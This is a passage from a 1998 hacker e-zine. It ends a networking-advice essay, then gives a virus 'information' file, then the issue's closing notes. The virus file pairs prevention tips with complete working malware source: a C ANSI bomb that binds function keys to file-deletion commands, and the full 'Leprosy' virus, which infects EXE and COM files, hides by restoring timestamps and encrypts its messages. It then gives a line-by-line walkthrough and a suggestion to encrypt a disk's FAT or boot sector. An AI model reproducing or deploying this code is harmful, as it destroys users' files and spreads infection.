Windows is fine. They can be cheap ones. Then read up on networking. Maybe set up a TCP-IP network between these three computers. Then access one of these other computer from DOS. Well good. You have knowledge of TCP-IP [the basis of the internet], DOS [how many million lines of UNIX code are in DOS??], and some lovely problem solving skills. There. You know some good stuff now! Maybe you want to add to your home network. Add some interesting things here and there and try them out. You can learn more every day. Maybe you want to try to put a Macintosh on your network. Hmm...Read up on it. Talk to some people. Once you have that then you are quite knowledgable! What next? Maybe some UNIX variance. By now you have heard about it. The free operating system [Linux] which you can put on an old 486 and hook up to your network too. There. Unix, Mac, TCP-IP, Windows, Problem Solving, Hardware skills. All lumped together. Then maybe, just maybe you want to host your very own networking help website on your very own network. Set up a server, and get a domain name and configure, configure, configure. That definitely adds to your knowledge! Fun. Now you know a whole bunch about hacking [you didn't even know it?] without having to go to ONE site with those flaming skulls. Good for you. I hope this text has made you think. It sure made me. All my ideas and anger on paper [what SHOULD I call it?] and enough information to get you in action. I haven't said once that you have to do anything. And you don't. Just go your own route. The network I talked about WOULD help you out. And it would be fun to build [and have]. So make your own decisions and keep thinking! -Digital Avatar 9.23.98 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 9 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Virii--Shit: A Virus Information Text File By Kleptic CREDITS: ------------------------------------------------------------- Author............................................Kleptic Editor............................................Kleptic Ideas, Source, Examples Supplied By...............Kleptic Facts Stolen From Several Sources By..............Kleptic ------------------------------------------------------------- Introduction: Welcome to my really long text file on Virus information and safety. I have always had a fascination of computer virii, since I first heard the word. I, like a lot of people, had no idea what they were about, and was extremely curious. And this text file will cover my process as I find out more about them. How they are written, why they act like they do, and if possible, why people would write them. In This File: Prevention And Protection Methods The "Internet Worm" Trojans, Worms, Virii, Ansi Bombs: What's the difference? Benign VS Malignant Virii Sample Source Code Of Virii Discussion Of The Infection And Encryption Methods Used By "Leprosy" The "Uncompress" Virus "Suicidal Tendencies" Department/Virus Of The Month Discussion Of Anti Viral Software Things You Should Know ----------------------------------------------------------------------------- Prevention And Protection Methods: ----------------------------------------------------------------------------- After the infamous "Michealangelo" panic, I realised what the masses are lacking is virus literacy. If people had a understanding of them, and knew the appropriate methods of prevention, and dealing with a infection, the situation would've never been blown out of proportion like it was. When I hear people ask questions such as "If I Put My Toothbrush Near A Infected Disk, Will I Catch The Virus When I Brush My Teeth?" I have to laugh...Ok, maybe that example is a little exaggerated, but some of the questions are hitting close to that level of stupidity, so here are some protection and prevention methods: 1. If you download a file from a public BBS, or a friend gives you a file that he downloaded from somewhere, be sure and uncompress the file onto a floppy and run your virus scanner on it. NEVER run a new file without checking it first. Some people believe a virus scanner can spot a file that is infected within a compressed file by running the virus scanner on it, this is NOT true. You have to decompress the file first. By doing this, you are dropping your chances of infection considerably BUT there is always the chance of a unknown virus that the scanner won't spot so that is why you have to ALWAYS have a backup of all your data on tape or disk. That way if the unknown virus wipes your hard drive, you have the backup and nothing is lost. 2. In the event of a virus infection, shut your computer off immediately and wait 10-20 seconds. NEVER do a "warm boot" (CTRL-ALT-DEL) because some virii can survive through a warm boot. Always do a "cold boot" (Shut the computer OFF). After the 10-20 seconds, boot your computer from a CLEAN WRITE PROTECTED DOS Bootable disk, and then run your virus scanner from a WRITE PROTECTED disk. (The reason for having the disks write protected is just in case the virus is still lurking around, it won't be able to write itself and infect the floppies). If the virus is a known one, have the virus scanner either fix the infected files, or delete them (and replace from your backup) or make a note of the infected files and erase them manually. 3. How do you spot a attack by a unknown virus? A) Change in sizes of files B) Change of file dates/times C) Deleted files D) Slower processing time E) Unusual messages F) Disk activity, more than usual (Writing to the disk when it's not necessary) 4. What to do in the event of a unknown virus attack? A) Follow steps of shutting machine off and re-booting as outlined in #2 B) Run your virus scanner and have it look for files that changed in size or date (if your scanner has a feature that makes note of original virus sizes/dates/times) C) If your virus scanner doesn't make note of original sizes/dates/times you can always make note of them manually and then check them yourself. It's time consuming, but can prevent serious damage to your data, and you should try to isolate a infected file and send it to ME (info on how to get it to me at the end of the newsletter) so I can attempt to dissect it and notify the appropriate person of the new virus. D) Some virus scanners come with a TSR that will prevent any writing to disk, it will pop a window or message on the screen saying: Attempting to write to Do you wish to do so? If something is trying to write to a file that shouldn't be written to at that time, chances are you are dealing with a unknown virus and should say no. Then try to find and isolate the virus. E) How do you spot a unknown virus or a known virus without running a virus scanner? 1) Most virii are tiny (2 kilobytes to 10 kilobytes) and the majority of them are .COM files so if you have, let's say, a 6K .COM file that claims to be a "awesome game" I'd be a little bit suspicious. 2) Weird names. I would not run "DIE.COM" or "KILLER.COM" and over the years I have run into files named that, when people tried to infect my computer. At least they could've named it something else not so obvious. 3) As stated in #1, the MAJORITY of them are small .COM files but they can be .EXE files as well, and bigger then 10K. All it takes is a little bit of common sense, and 99% of what could've been virus attacks on your computer can be prevented. All you have to remember is that they cannot infect your machine unless run first...BUT there is one virus out there that, when uncompressed, activates itself. This virus does NOT have to be executed in order to infect your machine, and it will be discussed later on. In the event of where this "uncompress" virus wipes some of your data, or any other virus, that's what backups are for. ALWAYS HAVE A BACKUP OF YOUR HARD DRIVE and NEVER put a floppy in the drive and run a program when there is a virus in memory because, chances are, that floppy will get ruined/infected as well, unless it is write protected. The instant you are aware of a infection, shut the machine off! Because there are some virii that, upon finding a write protected floppy that it cannot infect, or something else it can't do, "get mad" and cause destruction. ----------------------------------------------------------------------------- The "Internet Worm" ----------------------------------------------------------------------------- This has to be the most widely publicised case of a virus attack ever. On 10/02/88, Robert Morris, a graduate student, wrote and released a worm that infected "Internet" the world-wide network. Within hours, it infected thousands of computers. The worm was benign, not causing any damage to files or media, but replicated itself over and over rapidly, and resulted in the computers on Internet having to be shut down and all copies of the worm removed. Some of the hosts were still disconnected from the network eight days later, showing the impact this worm had. Morris claimed he did it as a experiment, and made a mistake in how fast it actually would replicate. The media, namely NY Times, USA Today, and The Wall Street Journal, gave the worm front page coverage. On November 4th, teams at several institutions went to work and successfully "decompiled" the worm and studied it in the language it was written in, "C language", but the source code was never released for fear of hackers using the source for malicious purposes. In the end, Morris was removed from school, ordered to pay $10,000 in fines, perform 400 hours of community services and was on 3 years probation. Some people argued as to whether or not Morris was guilty because he evidently didn't do it to cause damage, but rather as a experiment that went wrong. What the worm did: It hacked it's way into hosts attached to the internet by cracking passwords and then replicated itself rapidly, taking up all the memory and forcing the hosts to be shut down. ----------------------------------------------------------------------------- Trojans, Worms, Virii, Ansi Bombs: What's the difference? ----------------------------------------------------------------------------- Trojans: Programs disguised as a useful program or a existing real program that can cause damage on your system. Worms: Benign virii, rarely causing damage to media or files, such as the Internet worm. Ansi Bombs: Tiny programs that use ANSI to remap your keyboard causing keys, when pressed, to do other things. Example: If a Ansi bomb was in memory, and it remapped the "K" key to erase all the files in the current directory, as soon as you pressed K the files would be gone. Usually when you type C>ERASE *.* MS-DOS will respond with: All the files in the current directory will be deleted! Are you sure (y/n)? Some Ansi bombs are intelligent and can prevent such DOS messages from appearing. ----------------------------------------------------------------------------- Here is the source code to a simple Ansi bomb: ----------------------------------------------------------------------------- #include #define KILL(K, S) printf("\033[0;%d;\"%s\";13p", K, S) #define F1 59 #define F2 60 #define F3 61 #define F4 62 main() { KILL(F1, "DEL *.ZIP"); KILL(F2, "DEL *.ARJ"); KILL(F3, "DEL *.COM"); KILL(F4, "DEL *.EXE"); } ----------------------------------------------------------------------------- This just assigns the string (DEL *.ZIP etc) to the respective keys. If this Ansi bomb was in memory, and you pressed F1, it would delete all the files in the current directory with the extension of .ZIP. The command (DEL *.ZIP) would appear on the screen though, and you could use a file recovery program to recover the deleted files. There are more lethal Ansi bombs, ones that can format your hard drive and other such destructive acts. Prevention: Use NANSI or ZANSI rather than ANSI and the Ansi bombs won't work. ----------------------------------------------------------------------------- Virii: Destructive programs that use 'stealth' techniques, and can replicate. Not All virii are destructive, some can be benign, and just pop up annoying messages time to time or slow down system speed. ----------------------------------------------------------------------------- No more will be discussed of ANSI Bombs or Trojans as this newsletter is dedicated entirely to virii. ----------------------------------------------------------------------------- Benign VS Malignant Virii: ----------------------------------------------------------------------------- Benign Virii do not cause damage but do things such as take up all the memory, slow processing speed down, and send annoying messages to the console, or the printer, etc... Malignant, or Malicious, Virii cause actual destruction, deleting files, destroying the FAT or boot sector, locking up the computer, formatting disks or hard drives, etc... ----------------------------------------------------------------------------- Virus Source Code: ----------------------------------------------------------------------------- Now for the real thing, we will start with the C Language source code to the "Leprosy" Virus. ----------------------------------------------------------------------------- #pragma inline #define CRLF "\x17\x14" /* CR/LF combo encrypted. */ #define NO_MATCH 0x12 /* No match in wildcard search. */ char fake_msg[] = CRLF "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83."; char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; struct _dta /* Disk Transfer Area format for find. */ { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; /* Set it to default DTA. */ const char filler[] = "XX"; /* Pad file length to 666 bytes. */ const char *codestart = (char *) 0x100; /* Memory where virus code begins. */ const int virus_size = 666; /* The size in bytes of the virus code. */ const int infection_rate = 4; /* How many files to infect per run. */ char compare_buf[20]; /* Load program here to test infection. */ int handle; /* The current file handle being used. */ int datestamp, timestamp; /* Store original date and time here. */ char diseased_count = 0; /* How many infected files found so far. */ char success = 0; /* How many infected this run. */ /* The following are function prototypes, in keeping with ANSI */ /* Standard C, for the support functions of this program. */ int find_first( char *fn ); int find_healthy( void ); int find_next( void ); int healthy( void ); void infect( void ); void close_handle( void ); void open_handle( char *fn ); void print_s( char *s ); void restore_timestamp( void ); /*----------------------------------*/ /* M A I N P R O G R A M */ /*----------------------------------*/ int main( void ) { int x = 0; do { if ( find_healthy() ) { /* Is there an un-infected file? */ infect(); /* Well, then infect it! */ x++; /* Add one to the counter. */ success++; /* Carve a notch in our belt. */ } else { /* If there ain't a file here... */ _DX = (int) ".."; /* See if we can step back to */ _AH = 0x3b; /* the parent directory, and try */ asm int 21H; /* there. */ x++; /* Increment the counter anyway, to */ } /* avoid infinite loops. */ } while( x < infection_rate ); /* Do this until we've had enough. */ if ( success ) /* If we got something this time, */ print_s( fake_msg ); /* feed 'em the phony error line. */ else if ( diseased_count > 6 ) /* If we found 6+ infected files */ for( x = 0; x < 3; x++ ) /* along the way, laugh!! */ print_s( virus_msg[x] ); else print_s( fake_msg ); /* Otherwise, keep a low profile. */ return; } void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } int find_healthy( void ) { if ( find_first("*.EXE") != NO_MATCH ) /* Find EXE? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ if ( find_first("*.COM") != NO_MATCH ) /* Find COM? */ if ( healthy() ) /* If it's healthy, OK! */ return 1; else while ( find_next() != NO_MATCH ) /* Try a few more otherwise. */ if ( healthy() ) return 1; /* If you find one, great! */ return 0; /* Otherwise, say so. */ } int healthy( void ) { int i; datestamp = dta->datestamp; /* Save time & date for later. */ timestamp = dta->timestamp; open_handle( dta->filename ); /* Open last file located. */ _BX = handle; /* BX holds current file handle. */ _CX = 20; /* We only want a few bytes. */ _DX = (int) compare_buf; /* DX points to the scratch buffer. */ _AH = 0x3f; /* Read in file for comparison. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close the file. */ for ( i = 0; i < 20; i++ ) /* Compare to virus code. */ if ( compare_buf[i] != *(codestart+i) ) return 1; /* If no match, return healthy. */ diseased_count++; /* Chalk up one more fucked file. */ return 0; /* Otherwise, return infected. */ } void restore_timestamp( void ) { _AL = 0x01; /* Keep original date & time. */ _BX = handle; /* Same file handle. */ _CX = timestamp; /* Get time & date from DTA. */ _DX = datestamp; _AH = 0x57; /* Do DOS service. */ asm int 21H; return; } void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } int find_first( char *fn ) { _DX = (int) fn; /* Point DX to the file name. */ _CX = 0xff; /* Search for all attributes. */ _AH = 0x4e; /* 'Find first' DOS service. */ asm int 21H; /* Go, DOS, go. */ return _AX; /* Return possible error code. */ } int find_next( void ) { _AH = 0x4f; /* 'Find next' function. */ asm int 21H; /* Call DOS. */ return _AX; /* Return any error code. */ } void open_handle( char *fn ) { _DX = (int) fn; /* Point DX to the filename. */ _AL = 0x02; /* Always open for both read & write. */ _AH = 0x3d; /* "Open handle" service. */ asm int 21H; /* Call DOS. */ handle = _AX; /* Assume handle returned OK. */ return; } void close_handle( void ) { _BX = handle; /* Load BX register w/current file handle. */ _AH = 0x3e; /* Set up and call DOS service. */ asm int 21H; return; } ----------------------------------------------------------------------------- With source code discussed in this text file, main areas covered will be on encryption techniques, how the virus infects files, how they 'replicate' and 'breed' and how 'stealth techniques' are implemented in the code. In this case we will cover how the virus infects the files and encrypts. ----------------------------------------------------------------------------- Infection Method: ----------------------------------------------------------------------------- void infect( void ) { _DX = (int) dta->filename; /* DX register points to filename. */ _CX = 0x00; /* No attribute flags are set. */ _AL = 0x01; /* Use Set Attribute sub-function. */ _AH = 0x43; /* Assure access to write file. */ asm int 21H; /* Call DOS interrupt. */ open_handle( dta->filename ); /* Re-open the healthy file. */ _BX = handle; /* BX register holds handle. */ _CX = virus_size; /* Number of bytes to write. */ _DX = (int) codestart; /* Write program code. */ _AH = 0x40; /* Set up and call DOS. */ asm int 21H; restore_timestamp(); /* Keep original date & time. */ close_handle(); /* Close file. */ return; } ----------------------------------------------------------------------------- void infect( void ) is just what he named this function. The function will return nothing, and be called with no parameters as the two "voids" suggest. Register DX points to the filename as declared in the structure "_dta" ----------------------------------------------------------------------------- _dta structure: ----------------------------------------------------------------------------- struct _dta { char findnext[21]; char attribute; int timestamp; int datestamp; long filesize; char filename[13]; } *dta = (struct _dta *) 0x80; ----------------------------------------------------------------------------- Next in the "infect" function, 0x00 is assigned to the CX register. With function 43H in assembly, register CX is assigned with the bit of the attribute that you want to set the file to. Bit: Attribute: 0 Read Only 1 Hidden 2 System 3-4 Reserved 5 Archive 6-15 Reserved Because the author assigned 0x00 to CX, none of the above attributes were set on the file, allowing it to be written to. Next in the "infect" function is 0x01 being assigned to register AL 0x01 is telling the program we want to SET attributes. Then following that is: 0x43 being assigned to AH Which is telling the program we want to use function 43H (Get/Set Attributes) The current handle is assigned to register BX The size of the virus code, or the number of bytes to write, stored in the integer "virus_size" is assigned to register CX virus_size is declared and initialised at the beginning of the source code as a integer with the value "666" Then the virus code is written to the file, the file is closed and the original date and time the file had are restored. ----------------------------------------------------------------------------- The Method Of Encryption: ----------------------------------------------------------------------------- void print_s( char *s ) { char *p = s; while ( *p ) { /* Subtract 10 from every character. */ *p -= 10; p++; } _DX = (int) s; /* Set DX to point to adjusted string. */ _AH = 0x09; /* Set DOS function number. */ asm int 21H; /* Call DOS interrupt. */ return; } ----------------------------------------------------------------------------- The above function used in "Leprosy", called "print_s" accepts one parameter, a string of text, like these ones defined at the beginning of the Leprosy source code: ----------------------------------------------------------------------------- char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro.", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83.", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14." }; ----------------------------------------------------------------------------- Note: CRLF is defined as "\x17\x14" at the beginning of the source, \x17 being the hexadecimal code for a carriage return and \x14 the code for a line feed. ----------------------------------------------------------------------------- When a string is passed to the "print_s" function, it is un-encrypted. print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); would result in the following being printed to the screen: ------------------------------------------------------------ NEWS FLASH!! Your system has been infected with the incurable decay of LEPROSY 1.00, a virus invented by PCM2 in June of 1990. Good luck! ----------------------------------------------------------- The compiler I currently use does not accept inline assembly code as the author of leprosy had in his source so I modified the "print_s" function so I could compile it: For those interested, I use Microsoft Quick C (C) Microsoft ----------------------------------------------------------- /* NOTE: I removed the . from the end of each message because that is */ /* A $ when un-encrypted, and the $ to terminate the string is only */ /* required for the assembly version of the "print_s" function */ /* Also: The hexadecimal constants in the strings are as follows: */ /* \x13 = TAB, \x7f = u, \x83 = y, \x81 = w, \x80 = v */ #include #define CRLF "\x17\x14" char *virus_msg[3] = { CRLF "\x13XOa]*PVK]R++**cy\x7f|*}\x83}~ow*rk}*loox*sxpom~on*\x81s~r*~ro", CRLF "\x13sxm\x7f|klvo*nomk\x83*yp*VOZ\\Y]c*;8::6*k*\x80s|\x7f}*sx\x80ox~on*l\x83", CRLF "\x13ZMW<*sx*T\x7fxo*yp*;CC:8**Qyyn*v\x7fmu+\x17\x14" }; void print_s (char *s); int main (void); main() { print_s(virus_msg[0]); print_s(virus_msg[1]); print_s(virus_msg[2]); } void print_s (char *s) { char *p = s; while ( *p ) { *p -= 10; p++; } printf("%s\n",s); } ----------------------------------------------------------------------------- *p -= 10; is what does it all. It adds the value of 10 to each character and can be used either way, to unencrypt or to encrypt. if you change it to: *p += 10; it will then encrypt. You can also change it to: *p -= rand() % 35000; /* #include for "rand()" */ and it will change the value it uses to encrypt or un-encrypt everytime it passes through the "while" loop or you can change it to any value you like. ----------------------------------------------------------------------------- This method of encryption can be used to encrypt files, file allocation tables, boot sectors, etc. All you need is a function that reads and writes either of the three. For instance, read the contents of the File Allocation Table, and pass the string(s) through the print_s function and then write the encrypted string(s) back to the File Allocation Table. I don't suggest doing this to your hard drive, or anyone elses, for it will result in either you or the other person having to crack the encryption and restore the FAT manually, or formatting the hard drive and replacing all the files. If you want to experiment, do it on a floppy, like I did. ----------------------------------------------------------------------------- The "uncompress" virus ----------------------------------------------------------------------------- According to the person who uploaded it to the BBS where I got it from, this virus infects when you uncompress the file. I did not find any indication of this when I uncompressed the file, called NJERU.ARJ. It is a Arkanoid II: Revenge Of Doh crack released by FiRM that is infected with a strain of Jerusalem-4. I ran it and Norton Anti Virus (C) Symantec reported the virus in memory. I then proceeded to run EDLIN.EXE (C) Microsoft, SYS.COM (C) Microsoft, COMMAND.COM (C) Microsoft, and ARJ.EXE (C) Robert K. Jung to see what would happen. These are the results: Filename: Original Size: Size After Infection: EDLIN.EXE 14,121 bytes 15,936 bytes ARJ.EXE 98,968 bytes 100,784 bytes SYS.COM 13,440 bytes 15,253 bytes There were no size changes to COMMAND.COM, nor was it infected. A file was also created by the virus called "NJVR._OO" that was around 26K but only had one line in it, a error message concerning the media of the disk. Sorry, the exact size of the file NVJR._OO and the exact message are not available. When I attempted to remove the apparent text file using the MS-DOS "DEL" command, it displayed the error message and tried to write to drive A which was write protected at the time. Then it went back to drive B and apparently did damage to the media. I formatted the disk and it was fine afterwards. I have never seen anything like this before, a text file being able to do damage just by attempting to delete it. I guess it wasn't a text file after all but I still have no idea how it managed to corrupt the media on drive B. It also created a file called "N" which was 0 bytes and couldn't be deleted or read by Norton Anti Virus. ----------------------------------------------------------------------------- "Suicidal Tendencies" Department. (Appropriately named department: I can't believe I am deliberately running a virus on my system) This section of the newsletter will cover what happened when I run a virus on a floppy with MSDOS.SYS, IO.SYS, COMMAND.COM, a overlay file, a .EXE file and a few other assorted files on it. The virus of the month award goes to: The Perfume Virus ----------------------------------------------------------------------------- What Happened: ----------------------------------------------------------------------------- Filename: PERFUME.COM Filesize: 806 bytes Ok, I placed this file on drive B with the following files: Filename: Original Size: ---------------------------------- COMMAND.COM 47845 MSDOS.SYS 37394 IO.SYS 33430 ANSI.SYS 9029 RAMDRIVE.SYS 5873 CONFIG.SYS 39 UNDELETE.EXE 13924 AUTOEXEC.BAT 69 15ALL05.DEF 67278 MICHEL.DEF 456 NSETUP.OVL 876 PKUNZIP.EXE 23528 ---------------------------------- When I ran PERFUME.COM, it displayed the message: This is a tiny COM program. and it infected COMMAND.COM, enlarging it by 765 bytes to 48,610 bytes. It then proceeded to remove the hidden/system attribute from MSDOS.SYS but didn't infect it and then attempted to infect the disk in drive A, which was write protected at the time. The virus, realizing it couldn't write to drive A, displayed the message: Not ready reading drive A Insert disk with \COMMAND.COM in drive A Press any key to continue . . . Now, usually when DOS displays that message, it only needs to READ, and still could've if the disk was write protected, so evidently the virus was trying to outsmart me and fool me into thinking that was a DOS message so it could infect at least one more disk. I ran Norton Anti Virus v2.0 (C) Symantec, and it reported Perfume in memory so I re-booted and ran NAV again, this time it didn't report the virus being in memory, but did identify COMMAND.COM and PERFUME.COM as being infected. Also: In my search for the virus of the month, I came across a file called "ISRAELI.ZIP" which I thought to be a virus called "Israeli" but as it turns out it was a strain of Jerusalem-4, the same as the supposed "Uncompress virus" discussed earlier. The file was called: SORTINFT.EXE and was 3760 bytes. When I ran it, it did no damage to the disk or files but NAV did report Jerusalem-4 in memory so I re-booted. I then ran NAV again and when the screen came up saying who the copy of NAV was registered to, it said: Registered To: Kracked Phile Weird eh? And that's not all, I went to scan memory, and the little window came up that it displays the name of the current virus being scanned for, but that's it, no names were displayed. The program appeared to freeze up, and the disk kept spinning with the drive light on. I re-booted once again and ran NAV again. The weird letters were still there but it scanned memory no problem this time. I exited it from NAV and went to drive B to delete files when I noticed a file called: NRVN E._OO that was 4096 bytes long. Since when does DOS allow spaces in filenames? As a result I couldn't view it or delete it by typing: C>DEL NRVN E._OO so I typed: C>DEL *._OO and that worked. At one point a message also came up on the screen: "File Allocation Table Bad, Drive B". I imagine Jerusalem-4 was responsible for the weird file name and the bad FAT on drive B. I have no idea why NAV was acting funny, possibly a genuine disk error and not due to a virus, since the disk was always write protected. ----------------------------------------------------------------------------- Well, that's it for "Suicidal Tendencies" for this month! I don't recommend trying this on any computer with a hard drive. I do not have a hard drive on the machine I do my experimenting on, so if I am careful and keep the virus isolated to one disk, I have nothing to worry about. ----------------------------------------------------------------------------- Anti Viral Software: ----------------------------------------------------------------------------- Here are some nice virus scanners/anti viral programs to check out: ----------------------------------------------------------------------------- Scan v89b (C) McAfee - available on most Public Domain BBSes Clean v89b (C) McAfee - available on most Public Domain BBSes Norton Anti Virus v2.0 (C) Symantec Central Point Anti Virus (C) Central Point Software There are a few others, but I think the above four are the best. I use Norton Anti Virus and Scan. ----------------------------------------------------------------------------- Some things you should know: ----------------------------------------------------------------------------- Most people assume that a hard drive in a newly purchased computer, or a new program still in the shrinkwrap are always virus free. Well, this is just not true. The reported cases are few and far in between, but today anything can happen, and it has. A certain computer company shipped out 500 of their computers infected with the Michaelangelo virus, which started the whole panic in the first place. And there have been a few times where someone bought a brand new program, took it home and started using it, not expecting it to be infected with a virus. Well, it was. After all, people create virii and people work at computer companies, and software distributors. So what's stopping a pissed off employee from infecting a computer or a program? Nothing at all. How you take this information is entirely up to you. If you call a BBS and they say they scan for virii, don't assume that every single file will be virus free, some can sneak through. There is also the possibility of a unknown virus that was not detected by the scanner. Last but not least: ALWAYS BACK UP YOUR DATA!!! Philosophy Dept: "Knowledge is power" - Francis Bacon, 16th Century Philosopher "Even if a computer is locked, sealed in concrete, placed in a lead room and surrounded by armed guards, I'd still have my doubts." Those aren't the exact words and I forget who said that, but it is quite appropriate and all too true. I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated entirely to computer virii. Until Next Time......Be Careful!!! -= Kleptic =- ::::::::::::::::::::::::::::::::::::::::::::::::::::::::Nov/98 ::: The Discordant Opposition Journal ::: Issue 0 - File 10::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Conclusion: We've picked ourselves up off the ground and dusted ourselves off, the next issue is already shaping up well, we'll be unveiling the results of our insane competitions. Details of new sections will be in the next issue as well as various other exciting things. These will include a Review of the upcoming Mitnick Movie - 'TakeDown', 'Eluding Unix Authentication' and an interview with other notorious underground figures. Now, announcing two DoJ competitions, 'Cheesy ASCII Art' and 'Stalk the Staff'. The ASCII Art competition was inspired by Rue asking his friend bedlam if he wanted to do a little ASCII map for people going to the Dublin 2600 meeting (the answer is unprintable). For the Art competition we're looking for dodgy art of a purely ASCII nature, self portraits, maps, sexual innuendo, anything remotely ASCII like really. The best selection (or anything we get if it comes down to it) will be published in either next issue or at our convenience. The winner receives a free lifetime subscription to the DoJ and the respect an admiration of everyone for his elite ASCII skillz. Send your ASCII submissions to ascii@Rue-the-Day.net and we'll laugh hideously at your vague attempts... 'Stalk the Staff' is inspired by various people we know and the maniacs who shamelessly harass them online (and from personal experiences of one of the editors). By the way, we mean 'maniacs' in the nicest possible way. For the stalking competition we're basically looking for all you people out there that get off on disturbing minor underground celebrities, like ourselves, to send us emails of your insane (inane?) rants and raves. We're also looking for amusing stalker stories from anyone who has them. If you really want to send decapitated soft toys with 'Rue' written on them or whatever then take a photo instead as we aren't big into snail mail. All submissions welcomed, get stalking people! Send the submissions to stalkers@Rue-the-Day.net and you'll never hear from us again... Well, there you have it. The first issue of The DoJ. Be sure to look out for future issues as they are on their way. But to make sure we get there, we need your help. Fiction, articles, poetry, stories, fact, rumour, advice and even letters will all help get the nest issue out. Rue and myself wrote a lot for this issue, but in the future we hope to be able to leave most of it in your hands. Submit anything remotely underground that you might have. Underground instructions, warning, tales or whatever else you have. This issue wouldn't have been possible without the help of ethercat for the site, rOTTEN for the art, Digital Avatar and Kleptic for their submissions. Thank you and also if you have an underground site or newsletter worth a mention than contact us. You can mail the DoJ at discordia@Rue-the-Day.net and we will reply as soon as possible. Nothing more really to be said, hope you enjoyed Issue 0 and got something from it. Preferably not contageous. The following cultural content helped inspire us; The Dead Kennedys, Placebo, Scraping Foetus off The Wheel, A Tribe Called Quest, The Smashing Pumpkins, La Haine, Albino Alligator and Things to Do in Denver When You're Dead. Thanks and cya next time... And remember not to eat those big white mints ! Hail Discordia ! Cronus and Rue-the-Day Editors